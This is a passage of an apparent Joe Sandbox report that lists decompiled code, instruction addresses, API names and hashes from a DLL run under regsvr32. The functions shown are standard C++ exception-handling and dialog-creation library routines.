																		_t72 = _t326[4] + 0x10; // 0x10
																		_t73 =  &(_t284[4]); // 0x10
																		_t296 = _t73;
																		_t338 = _t282 + _t72 - _t296;
																		while(1) {
																			_t181 = _t296[_t338] & 0x000000ff;
																			_t212 = ( *_t296 & 0x000000ff) - _t181;
																			if(_t212 != 0) {
																				break;
																			}
																			_t296 =  &(_t296[1]);
																			if(_t181 != 0) {
																				continue;
																			}
																			break;
																		}
																		if(_t212 != 0) {
																			L67:
																			_t218 = _t218 - 1;
																			_t359 = _t359 + 4;
																			if(_t218 > 0) {
																				continue;
																			} else {
																				goto L68;
																			}
																		} else {
																			goto L59;
																		}
																	}
																}
															}
															goto L74;
														}
														_t328 =  *((intOrPtr*)(_t331 + 0x5d0));
														_t353 =  *((intOrPtr*)(_t331 + 0x5c8));
														_t357 =  *((intOrPtr*)(_t331 + 0x5b8));
														r15b = 1;
														 *(_t331 + 0x5b0) = r15b;
														E100398D0(_t215, _t282, _t284, _t357, _t353, _t321, _t326, _t328, _t328, _t331 + 0x70, _t353, _t357, _t361, _t363);
														__eflags = _t326;
														_t288 = _t282;
														if(__eflags != 0) {
															E1003F750(__eflags, _t282, _t288, _t361, _t282, _t321, _t326, _t321, _t326, _t353, _t357, _t361, _t363);
														}
														E100399F0(_t282);
														_t338 =  *(_t331 + 0x5c0);
														_t279 = _t282 + _t321[0xc];
														_t345 = _t288;
														 *((char*)(_t331 + 0x40)) =  *(_t331 + 0x5d8) & 0x000000ff;
														 *(_t331 + 0x38) = _t353;
														 *(_t331 + 0x30) = _t328;
														_t313 = _t361;
														 *(_t331 + 0x28) =  *( *(_t331 + 0x60));
														_t296 = _t357;
														 *(_t331 + 0x20) = _t279;
														E1003A050(_t288, _t357, _t361, _t321, _t326, _t328,  *(_t331 + 0x5c0), _t288);
														_t284 =  *(_t331 + 0x60);
													}
													goto L74;
													L68:
													r15d = r15d - 1;
													_t321 =  &(_t321[0x14]);
												} while (r15d > 0);
												_t284 =  *(_t331 + 0x60);
												_t328 =  *((intOrPtr*)(_t331 + 0x5d0));
												_t353 =  *((intOrPtr*)(_t331 + 0x5c8));
												_t357 =  *((intOrPtr*)(_t331 + 0x5b8));
												r15d =  *(_t331 + 0x5b0) & 0x000000ff;
											}
											L74:
											_t210 =  *((intOrPtr*)(_t331 + 0x54));
											_t206 =  *((intOrPtr*)(_t331 + 0x50));
											_t215 =  *(_t331 + 0x58);
										}
										_t206 = _t206 + 1;
										_t284 =  &(_t284[5]);
										 *((intOrPtr*)(_t331 + 0x50)) = _t206;
										 *(_t331 + 0x60) = _t284;
									} while (_t206 < _t210);
									_t324 =  *((intOrPtr*)(_t331 + 0x590));
									if(r15b == 0) {
										goto L77;
									}
								}
							}
							L85:
							_t152 = E1003D060(_t279, _t284, _t296, _t313, _t321, _t324, _t328, _t338, _t353);
							if(_t279[0x42] != 0) {
								_t152 = E100403F0(_t279, _t345, _t357, _t361, _t363);
							}
							goto L87;
						} else {
							goto L88;
						}
					}
				} else {
					_t185 = _t361[0x20];
					if(_t185 == 0x19930520 || _t185 == 0x19930521 || _t185 == 0x19930522) {
						if(_t361[0x30] != 0) {
							goto L28;
						} else {
							_t152 = E1003D060(_t279, _t284, _t296, _t313, _t321, _t324, _t328, _t338, _t353);
							if(_t279[0x3c] == 0) {
								L87:
								return _t152;
							} else {
								E1003D060(_t279, _t284, _t296, _t313, _t321, _t324, _t328, _t338, _t353);
								_t361 = _t279[0x3c];
								E1003D060(_t279, _t284, _t296, _t313, _t321, _t324, _t328, _t338, _t353);
								_t284 = _t279[0x3e];
								 *(_t331 + 0x5c0) = _t284;
								E10039A50(_t279, _t361[0x38]);
								_t296 = _t361;
								if(E100488A0(_t296) == 0) {
									E100403F0(_t279, _t345, _t357, _t361, _t363);
								}
								if( *_t361 == 0xe06d7363 && _t361[0x18] == 4) {
									_t199 = _t361[0x20];
									if(_t199 == 0x19930520 || _t199 == 0x19930521 || _t199 == 0x19930522) {
										if(_t361[0x30] == 0) {
											E100403F0(_t279, _t345, _t357, _t361, _t363);
										}
									}
								}
								E1003D060(_t279, _t284, _t296, _t313, _t321, _t324, _t328, _t338, _t353);
								if(_t279[0x42] != 0) {
									E1003D060(_t279, _t284, _t296, _t313, _t321, _t324, _t328, _t338, _t353);
									_t291 = _t279[0x42];
									E1003D060(_t279, _t291, _t296, _t313, _t321, _t324, _t328, _t338, _t353);
									_t313 = _t291;
									_t296 = _t361;
									_t279[0x42] = 0;
									if(E1003EF00(_t204, _t279, _t291, _t296, _t291, _t321, _t324, _t345, _t353, _t357, _t361, _t363) == 0) {
										_t296 = _t291;
										if(E1003F170(_t279, _t291, _t296, _t321, _t324) != 0) {
											E1003EE60(1, _t361);
											 *(_t331 + 0x5b0) = "bad exception";
											_t197 = E100486A0(_t216, _t291, _t331 + 0x78, _t331 + 0x5b0, _t321, _t324, _t328, _t338, _t345);
											_t313 = 0x1006b5c0;
											_t296 = _t331 + 0x78;
											 *((long long*)(_t331 + 0x78)) = 0x1005deb8;
											E1003A5A0(_t197, _t296, 0x1006b5c0);
											asm("int3");
										}
										E100403C0(_t279, _t296, _t313, _t345, _t357, _t361, _t363);
										asm("int3");
									}
									_t284 =  *(_t331 + 0x5c0);
								}
								goto L28;
							}
						}
					} else {
						goto L28;
					}
				}
			}






































                                                                              0x1003fac0
                                                                              0x1003fac0
                                                                              0x1003fac0
                                                                              0x1003fac0
                                                                              0x1003fac0
                                                                              0x1003fac0
                                                                              0x1003fac0
                                                                              0x1003fac5
                                                                              0x1003faca
                                                                              0x1003facf
                                                                              0x1003fad2
                                                                              0x1003fad9
                                                                              0x1003fadd
                                                                              0x1003fae1
                                                                              0x1003fae9
                                                                              0x1003faed
                                                                              0x1003faf1
                                                                              0x1003faf5
                                                                              0x1003faf9
                                                                              0x1003fafd
                                                                              0x1003fb00
                                                                              0x1003fb03
                                                                              0x1003fb0c
                                                                              0x1003fb0f
                                                                              0x1003fb12
                                                                              0x1003fb1a
                                                                              0x1003fb1f
                                                                              0x1003fb2d
                                                                              0x1003fb2f
                                                                              0x1003fb33
                                                                              0x1003fb48
                                                                              0x1003fb70
                                                                              0x1003fb73
                                                                              0x1003fb76
                                                                              0x1003fb79
                                                                              0x1003fb7e
                                                                              0x1003fb80
                                                                              0x1003fb4a
                                                                              0x1003fb4f
                                                                              0x1003fb58
                                                                              0x1003fb5d
                                                                              0x1003fb60
                                                                              0x1003fb63
                                                                              0x1003fb66
                                                                              0x1003fb69
                                                                              0x1003fb69
                                                                              0x1003fb87
                                                                              0x1003fb8e
                                                                              0x1003fb8e
                                                                              0x1003fb9a
                                                                              0x1003fcfb
                                                                              0x1003fd02
                                                                              0x10040106
                                                                              0x10040106
                                                                              0x1004010a
                                                                              0x00000000
                                                                              0x1004010c
                                                                              0x1004010c
                                                                              0x10040114
                                                                              0x1004014d
                                                                              0x10040152
                                                                              0x10040153
                                                                              0x10040154
                                                                              0x10040155
                                                                              0x10040156
                                                                              0x10040157
                                                                              0x10040158
                                                                              0x10040159
                                                                              0x1004015a
                                                                              0x1004015b
                                                                              0x1004015c
                                                                              0x1004015d
                                                                              0x1004015e
                                                                              0x1004015f
                                                                              0x10040160
                                                                              0x10040166
                                                                              0x10040169
                                                                              0x10040175
                                                                              0x10040180
                                                                              0x10040116
                                                                              0x10040116
                                                                              0x1004011e
                                                                              0x10040121
                                                                              0x10040124
                                                                              0x10040130
                                                                              0x10040133
                                                                              0x10040137
                                                                              0x1004013a
                                                                              0x1004013e
                                                                              0x10040143
                                                                              0x00000000
                                                                              0x10040143
                                                                              0x10040114
                                                                              0x1003fd13
                                                                              0x1003fd13
                                                                              0x1003fd1c
                                                                              0x1003fd34
                                                                              0x1003fff7
                                                                              0x10040004
                                                                              0x10040014
                                                                              0x10040018
                                                                              0x1004001d
                                                                              0x10040020
                                                                              0x10040028
                                                                              0x1004003b
                                                                              0x1004002a
                                                                              0x1004002a
                                                                              0x1004002f
                                                                              0x10040032
                                                                              0x10040036
                                                                              0x10040036
                                                                              0x1004003d
                                                                              0x10040047
                                                                              0x1004005a
                                                                              0x1004005f
                                                                              0x10040062
                                                                              0x10040067
                                                                              0x10040077
                                                                              0x1004007a
                                                                              0x1004007d
                                                                              0x1004008b
                                                                              0x1004008e
                                                                              0x10040092
                                                                              0x10040097
                                                                              0x1004009c
                                                                              0x100400a4
                                                                              0x100400ad
                                                                              0x100400ad
                                                                              0x10040047
                                                                              0x10040020
                                                                              0x1003fd3a
                                                                              0x1003fd3a
                                                                              0x1003fd47
                                                                              0x1003fd4c
                                                                              0x1003fd51
                                                                              0x1003fd56
                                                                              0x1003fd59
                                                                              0x1003fd5c
                                                                              0x1003fd5f
                                                                              0x1003fd64
                                                                              0x1003fd69
                                                                              0x1003fd6d
                                                                              0x1003fd73
                                                                              0x1003fd76
                                                                              0x1003fd7b
                                                                              0x00000000
                                                                              0x1003fd81
                                                                              0x1003fd81
                                                                              0x1003fd90
                                                                              0x1003fd92
                                                                              0x1003fda1
                                                                              0x1003fdaa
                                                                              0x1003fdae
                                                                              0x1003fdb4
                                                                              0x1003ffba
                                                                              0x1003fdc0
                                                                              0x1003fdc0
                                                                              0x1003fdc0
                                                                              0x1003fdcd
                                                                              0x1003fdcd
                                                                              0x1003fdd2
                                                                              0x1003fdd7
                                                                              0x1003fddb
                                                                              0x1003fddf
                                                                              0x1003fde4
                                                                              0x00000000
                                                                              0x1003fdf0
                                                                              0x1003fdf0
                                                                              0x1003fdf0
                                                                              0x1003fdf5
                                                                              0x1003fdfc
                                                                              0x1003fe00
                                                                              0x1003fe07
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003fe0d
                                                                              0x1003fe11
                                                                              0x1003fe16
                                                                              0x1003fe19
                                                                              0x00000000
                                                                              0x1003fe1f
                                                                              0x1003fe21
                                                                              0x1003fe31
                                                                              0x1003fe23
                                                                              0x1003fe23
                                                                              0x1003fe27
                                                                              0x1003fe2c
                                                                              0x1003fe2c
                                                                              0x1003fe37
                                                                              0x00000000
                                                                              0x1003fe3d
                                                                              0x1003fe3f
                                                                              0x1003fe4f
                                                                              0x1003fe4f
                                                                              0x1003fe41
                                                                              0x1003fe41
                                                                              0x1003fe4a
                                                                              0x1003fe4a
                                                                              0x1003fe51
                                                                              0x1003fe56
                                                                              0x1003fe5a
                                                                              0x1003fe60
                                                                              0x1003fea8
                                                                              0x1003feab
                                                                              0x1003feb2
                                                                              0x1003feb8
                                                                              0x1003fec1
                                                                              0x1003feca
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003fe62
                                                                              0x1003fe66
                                                                              0x1003fe76
                                                                              0x1003fe76
                                                                              0x1003fe68
                                                                              0x1003fe68
                                                                              0x1003fe71
                                                                              0x1003fe71
                                                                              0x1003fe78
                                                                              0x1003fe81
                                                                              0x1003fe86
                                                                              0x1003fe86
                                                                              0x1003fe8a
                                                                              0x1003fe90
                                                                              0x1003fe93
                                                                              0x1003fe98
                                                                              0x1003fe9a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003fe9c
                                                                              0x1003fea2
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003fea2
                                                                              0x1003fea6
                                                                              0x1003fed1
                                                                              0x1003fed1
                                                                              0x1003fed4
                                                                              0x1003feda
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003fea6
                                                                              0x1003fe60
                                                                              0x1003fe37
                                                                              0x00000000
                                                                              0x1003fe19
                                                                              0x1003ff1c
                                                                              0x1003ff24
                                                                              0x1003ff2c
                                                                              0x1003ff39
                                                                              0x1003ff45
                                                                              0x1003ff4d
                                                                              0x1003ff52
                                                                              0x1003ff55
                                                                              0x1003ff58
                                                                              0x1003ff66
                                                                              0x1003ff66
                                                                              0x1003ff6b
                                                                              0x1003ff74
                                                                              0x1003ff7c
                                                                              0x1003ff87
                                                                              0x1003ff8a
                                                                              0x1003ff93
                                                                              0x1003ff9a
                                                                              0x1003ff9f
                                                                              0x1003ffa2
                                                                              0x1003ffa6
                                                                              0x1003ffa9
                                                                              0x1003ffae
                                                                              0x1003ffb3
                                                                              0x1003ffb3
                                                                              0x00000000
                                                                              0x1003fee0
                                                                              0x1003fee0
                                                                              0x1003fee4
                                                                              0x1003fee8
                                                                              0x1003fef1
                                                                              0x1003fef6
                                                                              0x1003fefe
                                                                              0x1003ff06
                                                                              0x1003ff0e
                                                                              0x1003ff0e
                                                                              0x1003ffc2
                                                                              0x1003ffc2
                                                                              0x1003ffc6
                                                                              0x1003ffca
                                                                              0x1003ffca
                                                                              0x1003ffce
                                                                              0x1003ffd1
                                                                              0x1003ffd7
                                                                              0x1003ffdb
                                                                              0x1003ffdb
                                                                              0x1003ffe9
                                                                              0x1003fff1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003fff1
                                                                              0x1003fd7b
                                                                              0x100400b2
                                                                              0x100400b2
                                                                              0x100400bf
                                                                              0x100400c1
                                                                              0x100400c1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003fd1c
                                                                              0x1003fbab
                                                                              0x1003fbab
                                                                              0x1003fbb4
                                                                              0x1003fbcd
                                                                              0x00000000
                                                                              0x1003fbd3
                                                                              0x1003fbd3
                                                                              0x1003fbe0
                                                                              0x100400c6
                                                                              0x10040105
                                                                              0x1003fbe6
                                                                              0x1003fbe6
                                                                              0x1003fbeb
                                                                              0x1003fbf2
                                                                              0x1003fbfb
                                                                              0x1003fc02
                                                                              0x1003fc0a
                                                                              0x1003fc14
                                                                              0x1003fc1e
                                                                              0x1003fc20
                                                                              0x1003fc20
                                                                              0x1003fc2c
                                                                              0x1003fc35
                                                                              0x1003fc3e
                                                                              0x1003fc53
                                                                              0x1003fc55
                                                                              0x1003fc55
                                                                              0x1003fc53
                                                                              0x1003fc3e
                                                                              0x1003fc5a
                                                                              0x1003fc67
                                                                              0x1003fc6d
                                                                              0x1003fc72
                                                                              0x1003fc79
                                                                              0x1003fc7e
                                                                              0x1003fc81
                                                                              0x1003fc84
                                                                              0x1003fc96
                                                                              0x1003fc98
                                                                              0x1003fca2
                                                                              0x1003fca9
                                                                              0x1003fcc2
                                                                              0x1003fcca
                                                                              0x1003fcd6
                                                                              0x1003fcdd
                                                                              0x1003fce2
                                                                              0x1003fce7
                                                                              0x1003fcec
                                                                              0x1003fcec
                                                                              0x1003fced
                                                                              0x1003fcf2
                                                                              0x1003fcf2
                                                                              0x1003fcf3
                                                                              0x1003fcf3
                                                                              0x00000000
                                                                              0x1003fc67
                                                                              0x1003fbe0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1003fbb4

                                                                              APIs
                                                                                • Part of subcall function 100398D0: RtlLookupFunctionEntry.KERNEL32 ref: 10039961
                                                                              • __GetUnwindTryBlock.LIBCMT ref: 1003FB41
                                                                              • __GetUnwindTryBlock.LIBCMT ref: 1003FB79
                                                                              • _SetThrowImageBase.LIBCMT ref: 1003FC0A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                                                              • String ID: bad exception$csm$csm$csm
                                                                              • API String ID: 3766904988-820278400
                                                                              • Opcode ID: 1093982d1f11170708264c94f151c953e4833be649be065d1eedc7d5997a6dd0
                                                                              • Instruction ID: a88421b36b8d2de5b55c45d54c16da031645d5021e24a070402dd0b665e17983
                                                                              • Opcode Fuzzy Hash: 1093982d1f11170708264c94f151c953e4833be649be065d1eedc7d5997a6dd0
                                                                              • Instruction Fuzzy Hash: DDF1C236604BC18ACA62DF21E5403AEB7A4FB85BC6F55452AEFC98B756DF38D540CB00
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 10027F0C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 183COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 79%
                                                                              			E10027F0C(intOrPtr* __rax, intOrPtr* __rcx, long long __rdx, long long __r8, void* __r9, long long _a8, signed int _a32) {
				char _v88;
				long long _v96;
				char _v120;
				long long _v128;
				long long _v136;
				long long _v144;
				char _v152;
				long long _v168;
				void* __rbx;
				void* __rdi;
				void* __rsi;
				void* __r12;
				void* __r13;
				void* _t52;
				signed int _t58;
				signed int _t59;
				signed int _t72;
				signed int _t73;
				signed int _t75;
				void* _t81;
				signed int _t87;
				void* _t92;
				intOrPtr* _t96;
				intOrPtr _t97;
				long long _t101;
				intOrPtr* _t125;
				intOrPtr* _t130;
				long long _t131;
				void* _t140;
				intOrPtr* _t141;
				long long _t142;
				long long _t143;
				intOrPtr* _t144;
				long long _t146;

				_t138 = __r9;
				_t135 = __r8;
				_t121 = __rdx;
				_t102 = __rcx;
				_t96 = __rax;
				_a8 = __rcx;
				_v96 = 0xfffffffe;
				_t146 = __r8;
				_t142 = __rdx;
				_t130 = __rcx;
				if(__r9 == _t101) {
					E1000A57C(0, _t81, _t91, _t92, __rax, __r8, __r9, _t140);
				}
				E1000A57C(0, _t81, _t91, _t92, _t96, _t135, _t138, _t140);
				_t144 =  *((intOrPtr*)(_t96 + 0x68));
				_v128 = _t144;
				_t131 = _t101;
				_v144 = _t101;
				_v136 = _t101;
				E10015B20(0, 0x10, _t91, _t92, _t96, _t102, _t121, _t138, _t140, _t144);
				_t52 = E10015B20(0, 0x7c000, _t91, _t92, _t96, _t102, _t121, _t138, _t140, _t144);
				if(_t144 == _t101) {
					L6:
					__eflags = _t142 - _t101;
					if(_t142 != _t101) {
						E10029130(_t52);
						_t141 = _t96;
						_t96 - _t101 = _t96 == _t101;
						if(_t96 == _t101) {
							E10009538(0x80004005, _t91, _t96, _t101, _t102, _t121, _t130, _t135, _t138, _t141);
							asm("int3");
						}
						_t97 =  *_t96;
						 *((intOrPtr*)(_t97 + 0x18))();
						_t98 = _t97 + 0x18;
						_v152 = _t98;
						_a32 = 0;
						_t136 =  &_a32;
						_t55 = E1003749C(0, _t91, _t92, _t98, _t142,  &_v152, _t131,  &_a32, _t142);
						__eflags = _t55;
						_t87 = 0 | _t55 == 0x00000000;
						__eflags =  *0x10074cf8; // 0x0
						if(__eflags == 0) {
							L15:
							__eflags = _t87;
							if(_t87 == 0) {
								goto L18;
							}
							goto L16;
						} else {
							__eflags = _t87;
							if(_t87 != 0) {
								L16:
								E10037454(_t55, 0, _t87, _t91, _t92,  &_v120, _t142, _t131, _t136, _t142);
								_t91 = _a32 & 0x0000ffff;
								E10036FD0(E1003736C(_a32 & 0x0000ffff,  &_v120),  &_v120);
								_t131 = _t98;
								_v144 = _t98;
								E10036FB8( &_v120);
								__eflags = _t131 - _t101;
								if(_t131 != _t101) {
									GlobalLock();
									_t142 = _t98;
								}
								L18:
								 *(_t130 + 0x88) = 0xffffffff;
								 *(_t130 + 0x78) =  *(_t130 + 0x78) | 0x00000010;
								E100140D0(0, _t87, _t91, _t92, _t98, _t130, _t136, _t138, _t141);
								__eflags = _t146 - _t101;
								if(_t146 != _t101) {
									_t137 =  *((intOrPtr*)(_t146 + 0x40));
								} else {
									_t137 = _t101;
								}
								_v168 = _t101;
								CreateDialogIndirectParamW(??, ??, ??, ??, ??);
								_t143 = _t98;
								_v136 = _t98;
								_t125 = _v152 + 0xffffffe8;
								asm("lock xadd [edx+0x10], ecx");
								__eflags = 0xffffffff;
								if(0xffffffff <= 0) {
									_t137 =  *((intOrPtr*)( *_t125));
									 *((intOrPtr*)( *((intOrPtr*)( *_t125)) + 8))();
								}
								__eflags = _t144 - _t101;
								if(_t144 != _t101) {
									_t98 =  *_t144;
									 *((intOrPtr*)( *_t144 + 0x30))();
									__eflags = _t143 - _t101;
									if(_t143 != _t101) {
										_t98 =  *_t130;
										_t91 = 0;
										__eflags = 0;
										 *((intOrPtr*)( *_t130 + 0x258))();
									}
								}
								_t58 = E1001190C(0, 0x1fffffffe, _t91, _t92, _t98, _t137, 0x10027778, _t141);
								__eflags = _t58;
								if(_t58 == 0) {
									 *((intOrPtr*)( *_t130 + 0x228))();
								}
								__eflags = _t143 - _t101;
								if(_t143 != _t101) {
									__eflags =  *(_t130 + 0x78) & 0x00000010;
									if(( *(_t130 + 0x78) & 0x00000010) == 0) {
										DestroyWindow();
										_t143 = _t101;
									}
								}
								__eflags = _t131 - _t101;
								if(_t131 != _t101) {
									GlobalUnlock();
									GlobalFree(??);
								}
								__eflags = _t143 - _t101;
								_t49 = _t143 != _t101;
								__eflags = _t49;
								_t59 = 0 | _t49;
								L35:
								return _t59;
							}
							_t87 = 0x2a;
							_t72 = GetSystemMetrics(??);
							__eflags = _t72;
							if(_t72 == 0) {
								goto L18;
							}
							_t73 = E1003AE40(_v152, L"MS Shell Dlg");
							__eflags = _t73;
							_t87 = (_t73 & 0xffffff00 | _t73 == 0x00000000) & 0x000000ff;
							__eflags = _t87;
							if(_t87 == 0) {
								goto L18;
							}
							_t75 = _a32 & 0x0000ffff;
							__eflags = _t75 - 8;
							_t55 =  ==  ? 0 : _t75;
							_a32 =  ==  ? 0 : _t75;
							goto L15;
						}
					}
					_t59 = 0;
					goto L35;
				}
				if( *((intOrPtr*)( *_t130 + 0x258))() != 0) {
					_t96 =  *_t144;
					_t135 = _t142;
					_t121 =  &_v88;
					_t102 = _t144;
					_t52 =  *((intOrPtr*)(_t96 + 0x28))();
					_t142 = _t96;
					goto L6;
				}
				_t59 = 0;
				goto L35;
			}





































                                                                              0x10027f0c
                                                                              0x10027f0c
                                                                              0x10027f0c
                                                                              0x10027f0c
                                                                              0x10027f0c
                                                                              0x10027f0c
                                                                              0x10027f23
                                                                              0x10027f2f
                                                                              0x10027f32
                                                                              0x10027f35
                                                                              0x10027f3d
                                                                              0x10027f3f
                                                                              0x10027f44
                                                                              0x10027f48
                                                                              0x10027f4d
                                                                              0x10027f51
                                                                              0x10027f56
                                                                              0x10027f59
                                                                              0x10027f5e
                                                                              0x10027f68
                                                                              0x10027f72
                                                                              0x10027f7a
                                                                              0x10027fad
                                                                              0x10027fad
                                                                              0x10027fb0
                                                                              0x10027fb9
                                                                              0x10027fbe
                                                                              0x10027fc9
                                                                              0x10027fcb
                                                                              0x10027fd2
                                                                              0x10027fd7
                                                                              0x10027fd7
                                                                              0x10027fd8
                                                                              0x10027fde
                                                                              0x10027fe1
                                                                              0x10027fe5
                                                                              0x10027fea
                                                                              0x10027ff2
                                                                              0x10028002
                                                                              0x10028009
                                                                              0x1002800b
                                                                              0x1002800e
                                                                              0x10028014
                                                                              0x10028062
                                                                              0x10028062
                                                                              0x10028064
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10028016
                                                                              0x10028016
                                                                              0x10028018
                                                                              0x10028066
                                                                              0x1002806e
                                                                              0x10028074
                                                                              0x1002808b
                                                                              0x10028090
                                                                              0x10028093
                                                                              0x1002809d
                                                                              0x100280a2
                                                                              0x100280a5
                                                                              0x100280aa
                                                                              0x100280b0
                                                                              0x100280b0
                                                                              0x100280b3
                                                                              0x100280b3
                                                                              0x100280bd
                                                                              0x100280c4
                                                                              0x100280c9
                                                                              0x100280cc
                                                                              0x100280d3
                                                                              0x100280ce
                                                                              0x100280ce
                                                                              0x100280ce
                                                                              0x100280d7
                                                                              0x100280e9
                                                                              0x100280ef
                                                                              0x100280f2
                                                                              0x100280fc
                                                                              0x10028105
                                                                              0x1002810d
                                                                              0x1002810f
                                                                              0x10028114
                                                                              0x10028117
                                                                              0x10028117
                                                                              0x10028137
                                                                              0x1002813a
                                                                              0x1002813c
                                                                              0x10028148
                                                                              0x1002814b
                                                                              0x1002814e
                                                                              0x10028150
                                                                              0x10028153
                                                                              0x10028153
                                                                              0x10028158
                                                                              0x10028158
                                                                              0x1002814e
                                                                              0x1002815e
                                                                              0x10028163
                                                                              0x10028165
                                                                              0x1002816d
                                                                              0x1002816d
                                                                              0x10028173
                                                                              0x10028176
                                                                              0x10028178
                                                                              0x1002817c
                                                                              0x10028181
                                                                              0x10028187
                                                                              0x10028187
                                                                              0x1002817c
                                                                              0x1002818a
                                                                              0x1002818d
                                                                              0x10028192
                                                                              0x1002819b
                                                                              0x1002819b
                                                                              0x100281a1
                                                                              0x100281a4
                                                                              0x100281a4
                                                                              0x100281a7
                                                                              0x100281a9
                                                                              0x100281bb
                                                                              0x100281bb
                                                                              0x1002801a
                                                                              0x1002801f
                                                                              0x10028025
                                                                              0x10028027
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x10028039
                                                                              0x1002803e
                                                                              0x10028043
                                                                              0x10028046
                                                                              0x10028048
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x1002804a
                                                                              0x10028052
                                                                              0x10028056
                                                                              0x1002805a
                                                                              0x00000000
                                                                              0x1002805a
                                                                              0x10028014
                                                                              0x10027fb2
                                                                              0x00000000
                                                                              0x10027fb2
                                                                              0x10027f8f
                                                                              0x10027f98
                                                                              0x10027f9c
                                                                              0x10027f9f
                                                                              0x10027fa4
                                                                              0x10027fa7
                                                                              0x10027faa
                                                                              0x00000000
                                                                              0x10027faa
                                                                              0x10027f91
                                                                              0x00000000

                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.942654712.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                              • Associated: 00000003.00000002.942649727.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942884990.0000000010054000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942903120.000000001006E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942909111.0000000010074000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942916757.0000000010078000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              • Associated: 00000003.00000002.942975725.0000000010083000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDialogGlobalIndirectLockMetricsParamSystem
                                                                              • String ID: MS Shell Dlg
                                                                              • API String ID: 3758755205-76309092
                                                                              • Opcode ID: e4d9afc9bb7861b9a3d1aee660d54724616c8e1215bc681f9e91917707d6d0b4
                                                                              • Instruction ID: e63f518c9e14a02198c71d6b7b1c1cf90f8817823a87506333e44a894383264c
                                                                              • Opcode Fuzzy Hash: e4d9afc9bb7861b9a3d1aee660d54724616c8e1215bc681f9e91917707d6d0b4
                                                                              • Instruction Fuzzy Hash: A961F02A305A8083CA44DF25F8903AD23A0FB85BE4F958539EF5E07794DF78C999C700
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 1002B650 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 129windowCOMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 49%
                                                                              			E1002B650(void* __ebx, void* __edx, intOrPtr* __rax, void* __rcx, void* __rdx, void* __r8, void* __r9, void* __r11) {
				void* __rbx;
				void* __rdi;
				intOrPtr _t60;
				void* _t71;
				void* _t72;
				intOrPtr _t82;
				intOrPtr _t84;
				int _t87;
				int _t89;
				intOrPtr* _t100;
				signed long long _t101;
				void* _t103;
				long long _t104;
				intOrPtr* _t106;
				intOrPtr* _t119;
				intOrPtr _t123;
				void* _t125;
				void* _t126;
				void* _t127;
				void* _t133;
				void* _t135;

				_t135 = __r11;
				_t118 = __rdx;
				_t100 = __rax;
				_t71 = __ebx;
				 *((long long*)(_t127 + 0x20)) = 0xfffffffe;
				_t125 = __rdx;
				_t126 = __rcx;
				_t123 =  *((intOrPtr*)(__rdx + 0x18));
				if(_t123 == 0) {
					L17:
					return 0x1fffffffe;
				}
				E10029130(0x1fffffffe);
				_t106 = _t100;
				r8d = 0;
				r8b = _t100 != 0;
				if(r8d == 0) {
					E10009538(0x80004005, __edx, _t100, _t103, _t106, __rdx, _t123, __r8, __r9, __r11);
					asm("int3");
				}
				_t101 =  *_t100;
				 *((intOrPtr*)(_t101 + 0x18))();
				_t4 = _t101 + 0x18; // 0x18
				_t104 = _t4;
				 *((long long*)(_t127 + 0xf8)) = _t104;
				GetObjectW(??, ??, ??);
				_t87 =  *((intOrPtr*)(_t127 + 0xa8)) + 2;
				_t72 = 0xf;
				if(GetSystemMetrics(??) > _t87) {
					_t72 = 0xf;
					_t87 = GetSystemMetrics(??);
				}
